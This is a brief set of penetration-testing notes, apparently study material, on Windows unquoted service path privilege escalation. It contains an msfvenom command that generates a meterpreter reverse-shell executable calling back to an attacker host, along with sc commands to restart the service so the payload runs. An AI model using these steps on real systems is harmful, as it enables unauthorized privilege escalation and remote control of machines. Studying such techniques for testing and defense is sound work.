- Check for Any servicewith unquoted path like C:\Program Files\My Program\My Service\svice.exe . f the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths
C:\\Program.exe
C:\\Program Files\\My.exe
C:\\Program Files\\My Program\\My.exe
C:\\Program Files\\My Program\\My service\\svice.exe
- We can put My.exe in My Program, if we have write permission . Can put adduser exe like in
Binary hijacking / Insecure File permissions
- Or can create reverse shell,
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe
- Stop the service
sc stop svice.exe
- Transfer My.exe in My Program
- Start service
sc start svice.exe
- Now exploit is successful